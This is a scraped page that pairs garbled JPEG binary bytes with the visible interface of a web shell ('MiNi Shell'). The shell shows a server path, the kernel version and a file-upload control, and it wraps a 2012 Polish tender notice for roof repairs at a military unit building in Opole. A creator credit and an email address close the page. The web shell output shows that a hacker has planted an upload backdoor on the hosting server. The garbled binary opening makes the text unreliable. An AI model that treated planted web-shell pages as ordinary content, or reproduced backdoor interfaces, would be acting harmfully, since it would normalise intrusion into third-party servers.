JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120831/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120831/188291-N-2012.html

<p class="kh_header"><b>Wrocław: REMONT DACHU ORAZ ODTWORZENIE ŚCIAN SZCZYTOWYCH I NAROŻNYCH 
W BUDYNKU NR 37 W JW 1907 W OPOLU PRZY UL. DOMAŃSKIEGO 68</b><br>
<b>Numer ogłoszenia: 188291 - 2012; data zamieszczenia: 31.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowy Zarząd Infrastruktury , ul. Obornicka 126, 50-984 Wrocław, woj. dolnośląskie, tel. 071 765 68 42, faks 071 765 68 44, 765-68-02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rzi.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT DACHU ORAZ ODTWORZENIE ŚCIAN SZCZYTOWYCH I NAROŻNYCH 
W BUDYNKU NR 37 W JW 1907 W OPOLU PRZY UL. DOMAŃSKIEGO 68.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Stan istniejący - Pow. zabudowy 1 997 m2 Przedmiotowy budynek zlokalizowany jest w strefie ochrony konserwatorskiej. Budynek lokalizowany na terenie Jednostki Wojskowej 1907 w Opolu, stanowi jeden z wielu obiektów o funkcji garażowej na tym obszarze. Budynek jest usytuowany równolegle do budynku nr 24, tworząc tym samym duży plac wyznaczony okalającą zabudową. Na tym obszarze dominuje niska i długa zabudowa magazynowo-garażowa o horyzontalnym układzie, budynki mają jedną kondygnację oraz nieużytkowe poddasza. Od strony północno- zachodniego narożnika budynek przylega do jednokondygnacyjnej hali stalowej. Obsługa komunikacyjna budynku jest możliwa od strony placu cześć południowa, oraz od strony elewacji północnej. Wejścia do budynku nr 37 zlokalizowano od południa i mieszczą się one w dwóch wystających przed lico budynku klatkach schodowych. Charakter prac projektowych nie zakłada ingerencji w otaczający teren. Nie planuje się również zmiany obrysu zabudowy, dlatego powierzchnia zabudowy nie zmieni się. W zakresie infrastruktury technicznej do budynku zostały doprowadzone przyłącza instalacji elektrycznej oraz kanalizacji deszczowej. W związku z planowanym zakresem prac nie zakłada się ingerencji w istniejące uzbrojenie terenu. Wody deszczowe dachu budynku są odprowadzane rurami spustowymi do kanalizacji deszczowej. Zakłada się jedynie wymianę odcinków nadziemnych instalacji - rur spustowych do poziomu istniejących pionów żeliwnych.
Obiekt jest obsługiwana za pomocą systemu wewnętrznych dróg dojazdowych, umożliwiających dojazd od północy oraz południa. 2. Zakres robót ujętych w STWOiR. Roboty, których dotyczy niniejsza Specyfikacja Techniczna, obejmują wszystkie czynności umożliwiające i mające na celu prawidłowe wykonanie zadania, zgodnie z przedmiotem specyfikacji. 3. Przygotowanie terenu pod budowę. Przed przystąpieniem do wykonania robót remontowych należy teren inwestycji wygrodzić i zabezpieczyć zgodnie z odpowiednimi przepisami BHP. Nad wejściami wykonać tymczasowe zadaszenia. Teren budowy oznakować i wyposażyć w tablicę informacyjną, niezbędny sprzęt gaśniczy i środki pierwszej pomocy. Organizacja zaplecza budowy (kontener biurowy i socjalny, umywalnia z WC). 4.  Roboty budowlane dachowe. 1) Do demontażu lub rozbiórki przeznaczono następujące elementy wykończeniowe budynku: - pokrycie z dachówki ceramicznej karpiówki,
- łacenie dachu, - system odwodnienia dachu - rynny oraz rury spustowe,
- wskazane w części konstrukcyjnej elementy konstrukcji więźby dachowej,
- uszkodzone lukarny wole oko, - wskazane w opinii konstrukcyjnej i opisie konstrukcyjnym części ścian szczytowych budynku wraz ze ślusarką okienną,
- obróbki blacharskie okapów,- elementy wydzieleń siatkowych we wschodniej części poddasza, - podsufitkę klatek schodowych. 2) Wykonanie podwaliny żelbetowej wraz z izolacjami. 3) Wymurowanie ścian z cegły pełnej i klinkierowej elewacyjnej. 4) Odgrzybianie konstrukcji więźby dachowej przy użyciu szczotek stalowych, przybicie łat o przekroju 5/6,3 cm oraz kontrłat na połaci dachowej, impregnacja ogniochronna i grzybobójcza więźby dachowej, uzupełnienie brakujących kleszczy oraz naprawa uszkodzonych elementów więźby zgodnie ze schematami rysunkowymi w projekcie wykonawczym, wymiana lukarn typu wole oko, montaż membrany dachowej folii wstępnego krycia (FSW). 5)	Pokrycie dachu z dachówki ceramicznej karpiówki wraz dachówkami i gąsiorami systemowymi, wykonanie obróbek blacharskich z blachy tytan-cynk, obróbek systemowych lukarn, rynien i rur spustowych. 6) Montaż akcesoriów dachowych: ław kominiarskich, barier śniegowych, wyłazów dachowych. 7) Naprawa w systemie PCC oraz pokrycie blachą tytan-cynk płyt balkonowych lukarn. 8) Zamknięcie otworów w ścianach lukarn od strony balkonów załadowczych. 9) Montaż stolarki okiennej stalowej w ścianach szczytowych. 10)	Wykonanie tynków wew. kat III malowanych farbą emulsyjną. 11) Wymiana uszkodzonych bram garażowych szt.8 wskazanych przez Zamawiającego. 12) Wykonanie opaski betonowej. 5. Instalacja odgromowa: 1) Demontaż całej instalacji odgromowej budynku. 2)	Instalacja odgromowa będzie oparta na zwodach poziomych niskich wykonanych drutem Fe/Zn 8mm. 3) Zwody na kalenicy na wspornikach gąsiorkowych  mocowanych do podłoża ca 2m. Na powierzchniach płaskich zwody na wspornikach dachówkowych mocowanych do podłoża ca 2m. 4) Zwody pionowe niskie z drutu Fe/Zn 8 mm na wysokość 40cm powyżej wierzchu wentylatora. 5) Montaż przewodów odprowadzających instalacji odgromowej na wspornikach ściennych wbijanych do ścian. 6) Wymiana złączy kontrolnych instalacji odgromowej. 7) Montaż złączy kontrolnych na przewodach uziemiających. 8) Połączenie przewodów odprowadzających z rynnami za pomocą złączy rynnowych. 9) Połączenia zwodów poziomych z przewodami odprowadzającymi za pomocą złączy skręcanych uniwersalnych krzyżowych oraz odgałęźnych 3- wylotowych. 10) Pomiar wykonanej instalacji odgromowej. 11) Badania kontrolne odbiorcze oraz sporządzenie Protokołu badań urządzenia piorunochronnego. 12) Montaż uziomu pionowego. 13) Dostarczenie wyników pomiaru instalacji odgromowej oraz metryki urządzenia piorunochronnego. 6. Roboty towarzyszące i tymczasowe: 1) Wykonanie stemplowań związanych z przemurowaniem ścian szczytowych. 2)Usunięcie gruzu z rozbieranego pokrycia i ścian. 3) Montaż zsypu do gruzu. 4)Montaż systemowych deskowań do prac żelbetowych. 5) Montaż rusztowań, podestów. 6) Transport i koszt składowania, utylizacji gruzu oraz złomu. 7) Uzyskanie koniecznych zezwoleń, pozwoleń jeżeli przepisy administracyjno-budowlane tego wymagają. 8) Pomiary instalacji odgromowej wraz z opracowaniem Protokołu z pomiarów. 9) Wydzielenie strefy bezpieczeństwa poprzez wygrodzenie taśmą ostrzegawczą wraz z tablicami ostrzegawczymi. 10) Wykonanie tymczasowych ogrodzeń. 11) Wykonanie pomiarów elektrycznych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.10.00-4, 45.00.00.00-7, 45.10.00.00-8, 45.31.23.10-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium 
w wysokości - 31 600,00 zł. 2. Wadium wnoszone w pieniądzu musi znaleźć się na koncie Zamawiającego do dnia 17.09.2012 r. do godz. 10.00</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zobowiązany posiadać aktualną Decyzję Regionalnego Dyrektora Ochrony Środowiska właściwego dla miejsca siedziby lub zamieszkania wytwórcy odpadów (zgodnie z art. 21a ust. 2 pkt 1 i ust. 3 ustawy z dnia 27 kwietnia 2001 r. o odpadach tekst jednolity - Dz. U. z 2010 r. Nr 185 poz. 1243 z późn. zm.), zatwierdzającą przedstawiony przez Wykonawcę program gospodarki następującymi odpadami: gruz ceramiczny (kod odpadu 17 01 03), gruz ceglany (kod odpadu: 17 01 02). Na potwierdzenie ww. warunku należy dołączyć do oferty oświadczenie o jej posiadaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca musi wykazać, że dysponuje kierownikiem budowy i kierownikiem robót, którzy posiadają uprawnienia i należą do właściwej izby samorządu zawodowego: a)	kierownik budowy - w zakresie konstrukcyjno - budowlanym. Osoby, które przed dniem wejścia w życie ustawy (ustawa z dnia 7 lipca 1994 r. Prawo budowlane - tekst jednolity Dz. U. z 2010 r. Nr 243 poz.1623 z późniejszymi zmianami - art. 104), uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych 
w budownictwie, spełniają ww. warunek; b) kierownik robót instalacyjnych w zakresie sieci, instalacji i urządzeń elektrycznych. Osoby, które przed dniem wejścia w życie ustawy (ustawa z dnia 7 lipca 1994 r. Prawo budowlane - tekst jednolity Dz. U. z 2010 r. Nr 243 poz. 1623 z późniejszymi zmianami - art. 104), uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, spełniają ww. warunek; 2. Wykonawca musi wykazać, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnienia. Na potwierdzenie tych warunków należy załączyć wykazaz osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi i elektrycznymi wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi osobami - Formularz Nr 5 SIWZ oraz oświadczenie, że osoby które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - Formularz Nr 6 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. informacje ogólne o wykonawcy - Formularz Nr 1; 2. oświadczenie osób fizycznych - Formularz Nr 1a; 3. oświadczenie o spełnieniu warunków udziału w postępowaniu - Formularz Nr 2; 4. propozycje ewentualnego podzlecenia elementów robót - Formularz Nr 3; 5. kosztorys ofertowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość wprowadzenia zmian do umowy w przypadku:
1) zmniejszenia lub zwiększenia ilości jednostek obmiarowych w zakresie mającym wpływ na ustaloną kwotę wynagrodzenia oraz ustalony termin wykonania umowy;
2) ustalonego terminu umowy w przypadku zaistnienia niezależnych od Wykonawcy przeszkód, w szczególności działanie siły wyższej; 3) ustalonego terminu umowy w przypadku, gdy prace objęte umową zostały wstrzymane przez właściwe organy, co uniemożliwia terminowe zakończenie przedmiotu umowy; 2. Wszelkie zmiany do niniejszej umowy wymagają pod rygorem nieważności zachowania formy pisemnej, w formie aneksu. 3. Wykonawca zobowiązuje się do informowania Zamawiającego o zmianie formy prowadzonej działalności oraz zmianie adresu siedziby firmy i zamieszkania jej właściciela, pod rygorem uznania korespondencji kierowanej na ostatni podany przez Wykonawcę adres za doręczony. Powyższe zobowiązanie dotyczy okresu obowiązywania umowy, rękojmi i gwarancji oraz nie zakończonych rozliczeń wynikających z umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rzi.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejonowy Zarząd Infrastruktury, ul. Obornicka 126, 50-984 Wrocław - pok. 27.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.09.2012 godzina 10:00, miejsce: Rejonowy Zarząd Infrastruktury, ul. Obornicka 126, 50-984 Wrocław - kancelaria pok. 101.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com